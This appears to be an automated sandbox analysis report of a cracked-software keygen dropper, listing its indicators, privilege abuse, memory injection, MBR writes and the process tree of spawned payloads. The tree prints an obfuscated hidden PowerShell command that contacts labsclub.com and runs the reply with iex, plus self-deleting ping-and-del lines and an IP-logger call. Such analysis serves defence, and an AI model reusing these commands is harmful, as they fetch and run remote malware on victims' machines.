06700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid Process 4092 regedit.exe 6776 regedit.exe -
Runs ping.exe 1 TTPs 6 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 8588 PING.EXE 612 PING.EXE 3716 PING.EXE 3960 PING.EXE 2728 PING.EXE 4664 PING.EXE -
Script User-Agent 21 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 132 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2118 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1481 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2048 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2056 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 953 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 996 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 138 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 179 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2127 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1358 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1361 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1395 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1492 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 163 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 956 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1090 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2148 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
file.exekey.exe3E52.tmp.exe1614921505116.exe1614921510178.exemultitimer.exepid Process 1860 file.exe 1860 file.exe 1860 file.exe 1860 file.exe 1860 file.exe 1860 file.exe 1860 file.exe 1860 file.exe 1320 key.exe 1320 key.exe 1656 3E52.tmp.exe 1656 3E52.tmp.exe 1232 1614921505116.exe 1232 1614921505116.exe 1928 1614921510178.exe 1928 1614921510178.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe 3912 multitimer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid Process 616 616 -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exepid Process 5512 MicrosoftEdgeCP.exe 736 MicrosoftEdgeCP.exe 736 MicrosoftEdgeCP.exe 736 MicrosoftEdgeCP.exe 736 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
file.exekey.exemsiexec.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 1860 file.exe Token: SeImpersonatePrivilege 1320 key.exe Token: SeTcbPrivilege 1320 key.exe Token: SeChangeNotifyPrivilege 1320 key.exe Token: SeCreateTokenPrivilege 1320 key.exe Token: SeBackupPrivilege 1320 key.exe Token: SeRestorePrivilege 1320 key.exe Token: SeIncreaseQuotaPrivilege 1320 key.exe Token: SeAssignPrimaryTokenPrivilege 1320 key.exe Token: SeImpersonatePrivilege 1320 key.exe Token: SeTcbPrivilege 1320 key.exe Token: SeChangeNotifyPrivilege 1320 key.exe Token: SeCreateTokenPrivilege 1320 key.exe Token: SeBackupPrivilege 1320 key.exe Token: SeRestorePrivilege 1320 key.exe Token: SeIncreaseQuotaPrivilege 1320 key.exe Token: SeAssignPrimaryTokenPrivilege 1320 key.exe Token: SeImpersonatePrivilege 1320 key.exe Token: SeTcbPrivilege 1320 key.exe Token: SeChangeNotifyPrivilege 1320 key.exe Token: SeCreateTokenPrivilege 1320 key.exe Token: SeBackupPrivilege 1320 key.exe Token: SeRestorePrivilege 1320 key.exe Token: SeIncreaseQuotaPrivilege 1320 key.exe Token: SeAssignPrimaryTokenPrivilege 1320 key.exe Token: SeImpersonatePrivilege 1320 key.exe Token: SeTcbPrivilege 1320 key.exe Token: SeChangeNotifyPrivilege 1320 key.exe Token: SeCreateTokenPrivilege 1320 key.exe Token: SeBackupPrivilege 1320 key.exe Token: SeRestorePrivilege 1320 key.exe Token: SeIncreaseQuotaPrivilege 1320 key.exe Token: SeAssignPrimaryTokenPrivilege 1320 key.exe Token: SeImpersonatePrivilege 1320 key.exe Token: SeTcbPrivilege 1320 key.exe Token: SeChangeNotifyPrivilege 1320 key.exe Token: SeCreateTokenPrivilege 1320 key.exe Token: SeBackupPrivilege 1320 key.exe Token: SeRestorePrivilege 1320 key.exe Token: SeIncreaseQuotaPrivilege 1320 key.exe Token: SeAssignPrimaryTokenPrivilege 1320 key.exe Token: SeShutdownPrivilege 3916 msiexec.exe Token: SeIncreaseQuotaPrivilege 3916 msiexec.exe Token: SeSecurityPrivilege 1864 msiexec.exe Token: SeCreateTokenPrivilege 3916 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3916 msiexec.exe Token: SeLockMemoryPrivilege 3916 msiexec.exe Token: SeIncreaseQuotaPrivilege 3916 msiexec.exe Token: SeMachineAccountPrivilege 3916 msiexec.exe Token: SeTcbPrivilege 3916 msiexec.exe Token: SeSecurityPrivilege 3916 msiexec.exe Token: SeTakeOwnershipPrivilege 3916 msiexec.exe Token: SeLoadDriverPrivilege 3916 msiexec.exe Token: SeSystemProfilePrivilege 3916 msiexec.exe Token: SeSystemtimePrivilege 3916 msiexec.exe Token: SeProfSingleProcessPrivilege 3916 msiexec.exe Token: SeIncBasePriorityPrivilege 3916 msiexec.exe Token: SeCreatePagefilePrivilege 3916 msiexec.exe Token: SeCreatePermanentPrivilege 3916 msiexec.exe Token: SeBackupPrivilege 3916 msiexec.exe Token: SeRestorePrivilege 3916 msiexec.exe Token: SeShutdownPrivilege 3916 msiexec.exe Token: SeDebugPrivilege 3916 msiexec.exe Token: SeAuditPrivilege 3916 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msiexec.exevuc5xpml40m.tmpchashepro3.tmpSetup3310.tmpvict.tmpIBInstaller_97039.tmpvpn.tmppid Process 3916 msiexec.exe 4508 vuc5xpml40m.tmp 4956 chashepro3.tmp 4992 Setup3310.tmp 5024 vict.tmp 5048 IBInstaller_97039.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp 1868 vpn.tmp -
Suspicious use of SetWindowsHookEx 44 IoCs
Processes:
Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exefirefox.exe1614921505116.exefirefox.exe1614921510178.exeConhost.exe1614921515929.exevuc5xpml40m.exevuc5xpml40m.tmpaskinstall24.exesafebits.exevict.exechashepro3.exeSetup3310.exeIBInstaller_97039.exechashepro3.tmpSetup3310.tmpvpn.exeIBInstaller_97039.tmpvict.tmpwinlthst.exevpn.tmpAbbas.exewimapi.exechrome_proxy.exeg11uqjimrim.exeg11uqjimrim.tmpSetup.exeThunderFW.exeSetup.tmpMicrosoftEdge.exetapinstall.exeMiniThunderPlatform.exeMicrosoftEdgeCP.exetapinstall.exemask_svc.exemask_svc.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMaskVPNUpdate.exepid Process 3948 Setup.exe 3024 C0CA61A12E4C8B38.exe 2840 C0CA61A12E4C8B38.exe 2752 firefox.exe 1232 1614921505116.exe 812 firefox.exe 1928 1614921510178.exe 4300 Conhost.exe 4332 1614921515929.exe 4456 vuc5xpml40m.exe 4508 vuc5xpml40m.tmp 4552 askinstall24.exe 4568 safebits.exe 4764 vict.exe 4788 chashepro3.exe 4712 Setup3310.exe 4812 IBInstaller_97039.exe 4956 chashepro3.tmp 4992 Setup3310.tmp 5004 vpn.exe 5048 IBInstaller_97039.tmp 5024 vict.tmp 4108 winlthst.exe 1868 vpn.tmp 3176 Abbas.exe 1244 wimapi.exe 4396 chrome_proxy.exe 5168 g11uqjimrim.exe 5268 g11uqjimrim.tmp 5360 Setup.exe 5400 ThunderFW.exe 5424 Setup.tmp 6056 MicrosoftEdge.exe 4700 tapinstall.exe 5116 MiniThunderPlatform.exe 5512 MicrosoftEdgeCP.exe 5512 MicrosoftEdgeCP.exe 5972 tapinstall.exe 4468 mask_svc.exe 5912 mask_svc.exe 5596 MicrosoftEdge.exe 736 MicrosoftEdgeCP.exe 736 MicrosoftEdgeCP.exe 5768 MaskVPNUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Snap.Grabber.2.5.crack.by.aaocg.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exefile.exe3E52.tmp.execmd.exedescription pid Process procid_target PID 1152 wrote to memory of 804 1152 Snap.Grabber.2.5.crack.by.aaocg.exe 79 PID 1152 wrote to memory of 804 1152 Snap.Grabber.2.5.crack.by.aaocg.exe 79 PID 1152 wrote to memory of 804 1152 Snap.Grabber.2.5.crack.by.aaocg.exe 79 PID 804 wrote to memory of 952 804 cmd.exe 82 PID 804 wrote to memory of 952 804 cmd.exe 82 PID 804 wrote to memory of 952 804 cmd.exe 82 PID 804 wrote to memory of 2296 804 cmd.exe 83 PID 804 wrote to memory of 2296 804 cmd.exe 83 PID 804 wrote to memory of 2296 804 cmd.exe 83 PID 804 wrote to memory of 1412 804 cmd.exe 84 PID 804 wrote to memory of 1412 804 cmd.exe 84 PID 804 wrote to memory of 1412 804 cmd.exe 84 PID 804 wrote to memory of 4032 804 cmd.exe 85 PID 804 wrote to memory of 4032 804 cmd.exe 85 PID 804 wrote to memory of 4032 804 cmd.exe 85 PID 952 wrote to memory of 1320 952 keygen-pr.exe 86 PID 952 wrote to memory of 1320 952 keygen-pr.exe 86 PID 952 wrote to memory of 1320 952 keygen-pr.exe 86 PID 4032 wrote to memory of 1860 4032 keygen-step-4.exe 87 PID 4032 wrote to memory of 1860 4032 keygen-step-4.exe 87 PID 4032 wrote to memory of 1860 4032 keygen-step-4.exe 87 PID 1412 wrote to memory of 740 1412 keygen-step-3.exe 88 PID 1412 wrote to memory of 740 1412 keygen-step-3.exe 88 PID 1412 wrote to memory of 740 1412 keygen-step-3.exe 88 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 1320 wrote to memory of 1124 1320 key.exe 89 PID 740 wrote to memory of 612 740 cmd.exe 92 PID 740 wrote to memory of 612 740 cmd.exe 92 PID 740 wrote to memory of 612 740 cmd.exe 92 PID 1860 wrote to memory of 2324 1860 file.exe 94 PID 1860 wrote to memory of 2324 1860 file.exe 94 PID 1860 wrote to memory of 2324 1860 file.exe 94 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 2324 wrote to memory of 1656 2324 3E52.tmp.exe 95 PID 1860 wrote to memory of 3676 1860 file.exe 97 PID 1860 wrote to memory of 3676 1860 file.exe 97 PID 1860 wrote to memory of 3676 1860 file.exe 97 PID 3676 wrote to memory of 3716 3676 cmd.exe 100 PID 3676 wrote to memory of 3716 3676 cmd.exe 100 PID 3676 wrote to memory of 3716 3676 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Snap.Grabber.2.5.crack.by.aaocg.exe"C:\Users\Admin\AppData\Local\Temp\Snap.Grabber.2.5.crack.by.aaocg.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:1124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Users\Admin\AppData\Roaming\3E52.tmp.exe"C:\Users\Admin\AppData\Roaming\3E52.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Roaming\3E52.tmp.exe"C:\Users\Admin\AppData\Roaming\3E52.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:3716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3948 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3916
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3024 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:2752
-
-
C:\Users\Admin\AppData\Roaming\1614921505116.exe"C:\Users\Admin\AppData\Roaming\1614921505116.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921505116.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1232
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:812
-
-
C:\Users\Admin\AppData\Roaming\1614921510178.exe"C:\Users\Admin\AppData\Roaming\1614921510178.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921510178.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵PID:4300
-
-
C:\Users\Admin\AppData\Roaming\1614921515929.exe"C:\Users\Admin\AppData\Roaming\1614921515929.exe" /sjson "C:\Users\Admin\AppData\Roaming\1614921515929.txt"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4332
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5400
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:5116
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵PID:3628
-
C:\Users\Admin\AppData\Local\Temp\is-NLM9L.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-NLM9L.tmp\23E04C4F32EF2158.tmp" /SL5="$403AC,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵PID:6320
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵PID:8248
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵PID:8240
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵PID:8468
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"6⤵PID:8528
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:8588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2840 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4072
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:1352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"6⤵PID:2484
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:2728
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵PID:3320
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:3960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:684 -
C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:936 -
C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe" 1 3.1614921295.6041be4f67c09 1016⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ORRP470L9S\multitimer.exe" 2 3.1614921295.6041be4f67c097⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3912 -
C:\Users\Admin\AppData\Local\Temp\x11zrxnbte5\vuc5xpml40m.exe"C:\Users\Admin\AppData\Local\Temp\x11zrxnbte5\vuc5xpml40m.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\is-4309T.tmp\vuc5xpml40m.tmp"C:\Users\Admin\AppData\Local\Temp\is-4309T.tmp\vuc5xpml40m.tmp" /SL5="$7007A,870426,780800,C:\Users\Admin\AppData\Local\Temp\x11zrxnbte5\vuc5xpml40m.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\is-IQHI2.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-IQHI2.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4108 -
C:\Users\Admin\AppData\Local\Temp\i05BjXfG5.exe"C:\Users\Admin\AppData\Local\Temp\i05BjXfG5.exe"11⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5812 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im i05BjXfG5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\i05BjXfG5.exe" & del C:\ProgramData\*.dll & exit12⤵PID:3616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im i05BjXfG5.exe /f13⤵
- Kills process with taskkill
PID:1516
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:5300
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:4856
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xrzvzmgmavg\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\xrzvzmgmavg\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4552 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:4668
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:4556
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tcdb4ppzvcl\safebits.exe"C:\Users\Admin\AppData\Local\Temp\tcdb4ppzvcl\safebits.exe" /S /pubid=1 /subid=4518⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 6929⤵
- Program crash
PID:6068
-
-
-
